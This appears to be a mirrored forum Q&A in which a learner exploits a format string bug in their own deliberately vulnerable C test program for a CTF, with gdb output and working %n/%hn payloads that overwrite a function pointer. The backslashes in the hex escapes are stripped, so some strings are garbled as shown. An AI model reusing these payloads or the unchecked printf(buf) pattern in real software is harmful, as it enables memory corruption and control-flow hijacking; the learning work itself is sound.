TransWikia.com

Newbie problems exploiting a format string vulnerability

Reverse Engineering Asked by Polly on May 22, 2021

I encountered a print format vulnerability challenge in a CTF. I don’t know anything about these vulnerabilities, so I’m working my way through Saif El-Sherei’s format string exploitation tutorial from exploit-db.com (https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf). But, I’m getting stuck really early on. I’m hoping someone can point out where I’m going wrong.

Here’s some code I wrote:

#include <stdio.h>
#include <stdlib.h>

void nicefunction()
{
        printf("you are in the nice function!n");
}
void notnicefunction()
{
        printf("you are in the NOT nice function!n");
}
int foo()
{
  void (*fptr)() = &nicefunction;
  char buf[100];

  puts("Please enter a string. ");
  fgets(buf,80,stdin);
  puts("Here's your string");
  printf(buf);
  puts("nNow we call the nice function");
  (*fptr)();
  return 0;
}

int main(int argc, char **argv)
{
  foo();
}

My goal is to craft an input string that I can use to change fptr to point to notnicefunction. I compiled it with: gcc -m32 -g test.c -fno-stack-protector -z execstack -o test

I ran the binary under gdb and added before and after breakpoints. When I enter the string “AAAA” and then do x/20xw $esp afterwards, I see my 0x41414141 in the stack, at 0xffffd018. If I rerun and enter the string “AAAA %6$x” I get AAAA 41414141. So far so good.

Now I want to find the address of fptr. Using nm, I see that it should contain the value of 0x0804849b (the address of nicefunction). My goal is to change it to 0x080484b4, the address of notnicefunction. I rerun with AAAA, and then examine the stack until I find the address that contains 0x0804849b. That’s 0xffffd07c, 0x64 (100d) words deeper in the stack from the start of buf. Which makes sense.

I’d like to control the contents of fptr by using %n. So I crafted this input string: x7cxd0xffxffxffxffAAAA%5$x%n. I think this should change the contents of 0xffffd07c to 13d. But instead I segfault in the printf.

Where am I going wrong?

UPDATE: I tried writing my fptr address into the start of the buffer, just to see if I was writing the address correctly. But when I checked it in gdb, it had the ASCII representation in it: 

(gdb) x/20xw $esp+8
0xffffd018: 0x6337785c  0x3064785c  0x6666785c  0x6666785c

So the problem is that bash doesn’t like my hex literals. I guess I could fix this with redirection from a file. But if anyone knows of a cleaner way to handle this, I’d love to know about it.

MOAR UPDATE: Pawel’s comment below got me past the how-do-I-get-hex-bytes-into-this-binary hurdle. But I was still segfaulting on my %n. But the segfaults went away when I changed %5$x %n to %x %x %x %x %x %n. Now I am able to (sort of) control the contents of arbitrary stack memory. Whoohoo!

c++exploitlinux

2 Answers

I am not sure the %n takes the next argument after the %5$x.

Try x7cxd0xffxffAAAA%6$n. Seemed to work for me.

Answered by Artelius on May 22, 2021

The input string that finally let me execute the not nice function was echo -n -e 'x7cxd0xffxffJUNKx7exd0xffxff. %x %x %x %x %33929x %hn' > /tmp/xxx

This gave me:

22    (*fptr)();
(gdb) x/4xw 0xffffd070
0xffffd070: 0x00000001  0x00000003  0xf7e25a50  0x080484b4
(gdb) c
Continuing.
you are in the NOT nice function!

Answered by Polly on May 22, 2021

Add your own answers!

Ask a Question

Get help from others!

Recent Questions

Recent Answers

© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP